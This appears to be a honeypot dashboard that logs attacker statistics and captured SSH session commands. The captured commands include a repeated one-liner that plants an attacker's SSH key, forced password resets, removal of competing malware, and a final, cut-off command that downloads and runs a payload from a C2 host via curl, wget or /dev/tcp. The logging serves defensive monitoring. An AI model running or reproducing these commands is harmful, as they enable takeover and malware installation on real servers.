Honeypot Dashboard

Attacker	Origin	ISP	Attempts
specter_sol 31.145.191.148	🇹🇷 İzmit	Vodafone Net Iletisim Hizmetler AS	30173
shadow_sol 5.54.77.87	🇬🇷 Pátrai	VF GR Fixed	26364
autobahn_sol 185.207.113.182	🇩🇪 Frankfurt am Main	Zenlayer Inc	15679
gouda_sol 2.57.122.177	🇳🇱 Amsterdam	Unmanaged LTD	14404
silk_sol 8.138.226.108	🇨🇳 Guangzhou	Hangzhou Alibaba Advertising Co., Ltd.	13973
burger_sol 92.118.39.63	🇺🇸 Dallas	Unmanaged LTD	10647
phantom_sol 195.178.110.30	🇦🇩 Andorra la Vella	Techoff SRV Limited	10170
jade_sol 61.138.113.187	🇨🇳 Hohhot	CNC Group CHINA169 Neimeng Province Network	6478
yankee_sol 92.118.39.87	🇺🇸 Dallas	Unmanaged LTD	5795
star_sol 92.118.39.62	🇺🇸 Dallas	Unmanaged LTD	5266

Date	Sessions	Login Attempts	Successful	Unique IPs	Commands	Top Attacker
2026-04-29	465	474	38	52	40	gouda_sol (2.57.122.177)
2026-04-28	6014	5885	453	207	465	stroopwafel_sol (176.65.139.103)
2026-04-27	4331	4164	409	232	408	tulip_sol_6 (192.109.200.237)
2026-04-26	3982	3886	373	255	403	gouda_sol (2.57.122.177)
2026-04-25	3328	3140	295	187	322	clog_sol_4 (176.65.132.153)
2026-04-24	6111	5720	438	215	520	ghost_root_2 (171.243.228.160)
2026-04-23	3283	3137	417	179	459	gouda_sol (2.57.122.177)
2026-04-22	5891	5674	565	250	596	stroopwafel_sol_2 (176.65.139.95)
2026-04-21	3926	3682	390	182	514	tulip_sol_5 (45.156.87.99)
2026-04-20	1885	1800	312	148	280	gouda_sol (2.57.122.177)
2026-04-19	2719	2529	356	155	363	ghost_root_3 (101.36.107.152)
2026-04-18	25900	25705	378	222	590	shadow_sol (5.54.77.87)
2026-04-17	8177	8039	425	186	439	shadow_sol (5.54.77.87)
2026-04-16	3346	3182	520	176	659	gouda_sol (2.57.122.177)
2026-04-15	4363	3968	534	254	505	gouda_sol_3 (45.148.10.183)
2026-04-14	5645	5242	469	236	574	bike_sol (164.92.212.13)
2026-04-13	6274	6020	538	230	511	bike_sol (164.92.212.13)
2026-04-12	3764	3521	443	214	453	gouda_sol (2.57.122.177)
2026-04-11	3752	3433	537	171	519	gouda_sol_3 (45.148.10.183)
2026-04-10	4329	4032	647	179	654	tulip_sol_4 (176.65.139.101)
2026-04-09	4531	3662	511	218	688	dutch_root_2 (176.65.139.111)
2026-04-08	4670	4154	566	250	555	gouda_sol (2.57.122.177)
2026-04-07	3870	3687	595	207	648	gouda_sol (2.57.122.177)
2026-04-06	4208	3991	615	200	629	gouda_sol (2.57.122.177)
2026-04-05	3667	3601	517	177	524	gouda_sol (2.57.122.177)
2026-04-04	5210	4950	673	234	692	ghost_root_3 (101.36.107.152)
2026-04-03	4051	3754	490	180	474	burger_sol (92.118.39.63)
2026-04-02	3946	3647	455	238	447	gouda_sol (2.57.122.177)
2026-04-01	4666	4478	533	232	487	gouda_sol (2.57.122.177)
2026-03-31	4763	4514	526	259	515	phantom_sol (195.178.110.30)
2026-03-30	4477	4333	464	218	450	gouda_sol (2.57.122.177)
2026-03-29	6165	5845	545	265	542	gouda_sol (2.57.122.177)
2026-03-28	5890	5669	520	294	536	gouda_sol (2.57.122.177)
2026-03-27	3655	3300	502	241	485	gouda_sol (2.57.122.177)
2026-03-26	4199	3993	623	366	657	gouda_sol (2.57.122.177)
2026-03-25	3747	3490	564	328	611	gouda_sol (2.57.122.177)
2026-03-24	4185	3903	570	301	548	burger_sol (92.118.39.63)
2026-03-23	5138	6228	550	266	607	chateau_root (161.97.123.69)
2026-03-22	7426	8274	676	316	661	bike_sol_3 (172.233.53.115)
2026-03-21	6087	5718	694	314	715	burger_sol (92.118.39.63)
2026-03-20	39963	39771	696	272	797	specter_sol (31.145.191.148)
2026-03-19	13163	12759	458	249	454	specter_sol (31.145.191.148)
2026-03-18	4994	4571	598	271	773	maple_sol (143.110.211.250)
2026-03-17	3833	3523	527	288	707	gouda_sol (2.57.122.177)
2026-03-16	4748	4546	583	333	685	gouda_sol (2.57.122.177)
2026-03-15	6232	5979	624	466	1033	pretzel_sol (82.165.66.87)
2026-03-14	8796	305	46	315	103	pretzel_sol (82.165.66.87)
2026-03-13	7963	4	0	351	0	stroopwafel_root (45.148.10.121)
2026-03-12	8281	6	0	300	0	stroopwafel_root (45.148.10.121)
2026-03-11	7589	4	0	368	0	stroopwafel_root (45.148.10.121)
2026-03-10	9462	10	0	350	0	stroopwafel_root (45.148.10.121)
2026-03-09	8825	46	0	367	0	blitz_root (139.19.117.197)
2026-03-08	6388	45	0	314	0	blitz_root (139.19.117.197)
2026-03-07	6565	3182	363	373	450	jade_sol (61.138.113.187)
2026-03-06	6559	6100	705	411	873	eagle_sol (159.223.135.19)
2026-03-05	5607	5453	679	198	777	jade_sol (61.138.113.187)
2026-03-04	8255	8148	827	140	1225	jade_sol (61.138.113.187)
2026-03-03	5294	5258	733	125	1164	jade_sol (61.138.113.187)
2026-03-02	9332	9266	1008	187	2114	jade_sol (61.138.113.187)
2026-03-01	13336	13199	1052	201	2342	autobahn_sol (185.207.113.182)
2026-02-28	15824	15793	724	135	1433	autobahn_sol (185.207.113.182)

Metric	Total	Avg / Day	Last 24h	Peak Day
Sessions	403,045	6607.3	5,751	39,963 (Mar 20)
Login Attempts	332,392	5449.0	5,670	39,771 (Mar 20)
Successful Logins	29,349	481.1	413	1,052 (Mar 1)
Unique IPs	7,325	120.1	207	466 (Mar 15)
Commands Executed	35,675	584.8	430	2,342 (Mar 1)
Success Rate	8.8%	8.8%	7.3%	17.3% (Apr 20)
Days Active	61

🎭 gouda_sol (2.57.122.177) — Amsterdam, The Netherlands · 5449 sessions · 5449 cmds

2026-02-28 06:13 EST · as firedancer/firedancer, raydium/raydium, sol/123

Ran uname 3954x across 3954 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×5449

↳ obfuscated system check

🎭 jade_root_2 (111.26.6.111) — Jilin, China · 2 sessions · 2 cmds

2026-04-07 13:51 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m ×2

🎭 tulip_sol (80.94.92.183) — Amsterdam, The Netherlands · 1178 sessions · 1178 cmds

2026-02-28 03:53 EST · as sol/123, sol/sol, solana/solana

Ran uname 847x across 847 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×1178

↳ obfuscated system check

🎭 wraith_root_24 (42.1.120.37) — Da Nang, Vietnam · 1 session · 4 cmds

2026-04-29 01:24 EDT · as root/root

ip → network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

🎭 strudel_pi (43.165.2.61) — Frankfurt am Main, Germany · 1 session · 1 cmd

2026-04-29 01:16 EDT · as guest/guest

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 hanbok_root_6 (112.219.151.50) — Yangsan, South Korea · 1 session · 2 cmds

2026-04-29 01:14 EDT · as oracle/welcome

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 phantom_sol (195.178.110.30) — Andorra la Vella, Andorra · 3048 sessions · 3048 cmds

2026-02-28 04:07 EST · as sol/sol, solana/sol, solana/solana

Ran uname 3707x across 3707 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×3048

↳ obfuscated system check

🎭 kimchi_root (58.229.141.26) — Hwaseong-si, South Korea · 1 session · 2 cmds

2026-04-29 01:02 EDT · as oracle/oralce

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 toucan_root (177.54.62.66) — Criciúma, Brazil · 1 session · 2 cmds

2026-04-29 00:52 EDT · as oracle/oralce

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 shadow_root_21 (154.221.23.179) — Chai Wan, Hong Kong · 1 session · 2 cmds

2026-04-29 00:36 EDT · as oracle/abc123

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 dutch_root_7 (31.56.209.39) — Eygelshoven, The Netherlands · 34 sessions · 102 cmds

2026-04-17 14:00 EDT · as admin/admin

echo → cat → ?

$ echo "cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps" | sh ×34

$ cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps ×34

$ ×34

🎭 jade_root_3 (221.15.194.222) — Zhengzhou, China · 1 session · 1 cmd

2026-04-28 23:20 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 clog_sol_2 (45.153.34.114) — Eygelshoven, Netherlands · 35 sessions · 35 cmds

2026-04-28 22:39 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 4x across 4 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×35

🎭 stroopwafel_sol_3 (45.153.34.71) — Eygelshoven, Netherlands · 35 sessions · 35 cmds

2026-04-28 22:01 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×35

🎭 sensei (43.153.147.41) — Tokyo, Japan · 1 session · 1 cmd

2026-04-28 21:51 EDT · as test/test

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 gouda_sol_4 (2.57.122.238) — Amsterdam, The Netherlands · 396 sessions · 396 cmds

2026-03-02 02:53 EST · as sol/123, sol/12345678, sol/sol

Ran uname 279x across 279 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×396

↳ obfuscated system check

🎭 bike_sol_4 (80.94.92.168) — Amsterdam, The Netherlands · 92 sessions · 92 cmds

2026-02-28 12:34 EST · as solana/solana

Ran uname 76x across 76 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×92

↳ obfuscated system check

🎭 phantom_root_20 (43.156.203.174) — Singapore, Singapore · 1 session · 1 cmd

2026-04-28 21:17 EDT · as root/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 shadow_root_22 (43.134.94.132) — Singapore, Singapore · 1 session · 1 cmd

2026-04-28 21:14 EDT · as root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 yankee_root_11 (64.50.188.92) — Chicago, United States · 4 sessions · 4 cmds

2026-04-15 16:10 EDT · as admin/123456, pi/raspberry, postgres/postgres

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a ×4

↳ OS/kernel identification

🎭 burger_sol (92.118.39.63) — Dallas, United States · 2730 sessions · 2730 cmds

2026-02-28 08:44 EST · as sol/123, sol/12345678, sol/sol

Ran uname 960x across 960 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×2730

↳ obfuscated system check

🎭 tiger_root_3 (182.79.216.98) — New Delhi, India · 2 sessions · 4 cmds

2026-04-28 20:35 EDT · as oracle/123123, oracle/oracle!@#

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

🎭 shadow_root_23 (47.82.102.241) — Hong Kong, Hong Kong · 1 session · 1 cmd

2026-04-28 19:37 EDT · as postgres/postgres

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 stroopwafel_sol (176.65.139.103) — Eygelshoven, The Netherlands · 105 sessions · 105 cmds

2026-04-18 08:55 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 3x across 3 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×105

🎭 shadow_root_24 (212.154.234.9) — Almaty, Kazakhstan · 1 session · 20 cmds

2026-04-28 15:13 EDT · as admin/asdf1234

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "asdf1234\nRQsPelbPbRRw\nRQsPelbPbRRw"|passwd|bash

$ Enter new UNIX password:

$ echo "asdf1234\nRQsPelbPbRRw\nRQsPelbPbRRw\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 monsoon_root (20.244.18.126) — Pune, India · 1 session · 2 cmds

2026-04-28 15:07 EDT · as oracle/Oracle2022

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 liberty_root_5 (199.231.163.19) — Dallas, United States · 3 sessions · 24 cmds

2026-03-18 15:54 EDT · as oracle/Oracle2022, oracle/oracle@, ubuntu/password

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×3

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×3

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "password\nQe5leTlTI5hN\nQe5leTlTI5hN"|passwd|bash

$ Enter new UNIX password:

$ echo "password\nQe5leTlTI5hN\nQe5leTlTI5hN\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 yankee_sol_6 (50.6.227.30) — Ashburn, United States · 2 sessions · 2 cmds

2026-04-17 05:02 EDT · as deploy/deploy, oracle/Aa123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a ×2

↳ OS/kernel identification

🎭 monsoon_root_2 (159.65.144.195) — Bengaluru, India · 1 session · 1 cmd

2026-04-28 13:25 EDT · as root/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 dragon_root (123.207.0.73) — Guangzhou, China · 1 session · 1 cmd

2026-04-28 12:06 EDT · as pi/pi

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 shadow_sol_3 (37.111.53.110) — Yangon, Myanmar · 25 sessions · 25 cmds

2026-04-26 14:35 EDT · as oracle/!QAZ2wsx, oracle/!QAZ2wsx#EDC4rfv, oracle/0racle

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a ×25

↳ OS/kernel identification

🎭 wok_db (47.115.229.129) — Shenzhen, China · 1 session · 1 cmd

2026-04-28 05:03 EDT · as mysql/mysql

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 ghost_root_37 (45.134.9.27) — Mexico City, Mexico · 1 session · 19 cmds

2026-04-28 05:01 EDT · as root/P@ssw0rd1!

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:MMpLZOpMEpNd"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 bike_root (5.255.114.165) — Dronten, Netherlands · 43 sessions · 43 cmds

2026-04-23 09:50 EDT · as admin/123456, admin/admin, admin/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×43

🎭 cipher_db (8.217.105.235) — Hong Kong, Hong Kong · 1 session · 1 cmd

2026-04-27 23:36 EDT · as oracle/oracle123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 clog_sol_3 (80.94.92.184) — Amsterdam, The Netherlands · 105 sessions · 105 cmds

2026-03-04 14:25 EST · as sol/123456, sol/sol, solana/solana

Ran uname 111x across 111 sessions — automated OS fingerprinting.

$ /bin/./uname -s -v -n -r -m ×105

↳ obfuscated system check

🎭 wraith_pi (160.191.89.76) — Go Vap, Vietnam · 1 session · 1 cmd

2026-04-27 22:05 EDT · as pi/raspberry

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 dragon_root_2 (116.62.172.3) — Hangzhou, China · 1 session · 1 cmd

2026-04-27 20:21 EDT · as postgres/postgres

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 lotus_root_5 (20.235.162.205) — Chennai, India · 1 session · 1 cmd

2026-04-27 19:59 EDT · as oracle/oracle1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 specter_root_28 (145.241.123.102) — Dubai, United Arab Emirates · 1 session · 1 cmd

2026-04-27 19:52 EDT · as postgres/postgres

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 kimchi_root_2 (211.221.196.103) — Yongin-si, South Korea · 2 sessions · 2 cmds

2026-04-04 03:41 EDT · as guest/guest, test/test

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a ×2

↳ OS/kernel identification

🎭 jade_pi (39.106.23.166) — Beijing, China · 1 session · 1 cmd

2026-04-27 17:59 EDT · as pi/pi

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 fog_root_8 (139.59.183.60) — Slough, United Kingdom · 2 sessions · 2 cmds

2026-04-10 23:18 EDT · as oracle/oracle123, ubuntu/ubuntu

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a ×2

↳ OS/kernel identification

🎭 wok_root_2 (116.177.172.111) — Jinrongjie, China · 1 session · 1 cmd

2026-04-27 15:06 EDT · as admin/admin

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 specter_root_29 (34.92.62.225) — Hong Kong, Hong Kong · 1 session · 1 cmd

2026-04-27 13:19 EDT · as oracle/oracle

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 dragon_root_3 (60.212.99.149) — Jinan, China · 1 session · 5 cmds

2026-04-27 12:49 EDT · as root/123456

echo → payload download from C2 → execute from /tmp → '8

$ echo 1 > /dev/null && cat /bin/echo

$ nohup $SHELL -c "curl http://176.88.9.106:9877/linux -o /tmp/xIwlr71hOZ; if [ ! -f /tmp/xIwlr71hOZ ]; then wget http://176.88.9.106:9877/linux -O /tmp/xIwlr71hOZ; fi; if [ ! -f /tmp/xIwlr71hOZ ]; then exec 6<>/dev/tcp/176.88.9.106/9877 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/xIwlr71hOZ ; chmod +x /tmp/xIwlr71hOZ && /tmp/xIwlr71hOZ 